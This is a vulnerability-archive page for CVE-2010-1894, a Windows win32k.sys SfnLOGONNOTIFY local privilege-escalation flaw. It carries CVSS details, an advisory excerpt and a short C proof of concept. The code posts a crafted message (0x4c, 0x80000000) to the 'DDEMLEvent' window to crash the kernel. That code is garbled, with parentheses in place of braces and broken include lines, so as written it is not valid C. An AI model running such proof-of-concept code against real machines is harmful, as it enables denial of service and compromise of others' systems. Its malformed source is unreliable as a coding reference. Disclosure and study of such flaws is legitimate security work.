Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability

2010.08.12

Credit: MJ0011

Risk: Medium

Local: Yes

Remote: No

CVE: CVE-2010-1894

CWE: CWE-264

CVSS Base Score: 7.2/10

Impact Subscore: 10/10

Exploitability Subscore: 3.9/10

Exploit range: Local

Attack complexity: Low

Authentication: No required

Confidentiality impact: Complete

Integrity impact: Complete

Availability impact: Complete

# Source: http://www.securityfocus.com/bid/39630/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
A local attacker may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.
Microsoft Windows 2000, Windows XP and Windows 2003 are affected by this issue.
# Include "stdafx.h"
# Include "windows.h"
int main (int argc, char * argv [])
(
printf("Microsoft Windows Win32k.sys SfnLOGONNOTIFY Local D.O.S Vuln\nBy MJ0011\nth_decoder@126.com\nPressEnter");
getchar();
HWND hwnd = FindWindow ("DDEMLEvent", NULL);
if (hwnd == 0)
(
printf ("cannot find DDEMLEvent Window! \ n");
return 0;
)
PostMessage (hwnd, 0x4c, 0x4, 0x80000000);
return 0;
)

References:

http://www.microsoft.com/technet/security/Bulletin/MS10-048.mspx

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.